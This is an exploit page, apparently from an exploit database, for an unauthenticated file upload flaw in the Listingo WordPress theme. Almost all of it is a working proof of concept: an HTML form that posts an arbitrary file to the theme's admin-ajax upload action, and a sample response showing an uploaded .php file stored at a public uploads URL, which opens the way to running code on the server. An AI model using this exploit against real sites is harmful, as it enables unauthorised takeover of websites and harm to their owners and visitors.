Share
## https://sploitus.com/exploit?id=WPEX-ID:E39B59B0-F24F-4DE5-A21C-C4DE34C3A14F
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Listingo Unauthenticated File Upload</title>
</head>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
Upload a File:
<input type="file" name="listingo_uploader" id="listingo_uploader">
<input type="submit" name="submit" value="Start Upload">
</form>
</body>
</html>
The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}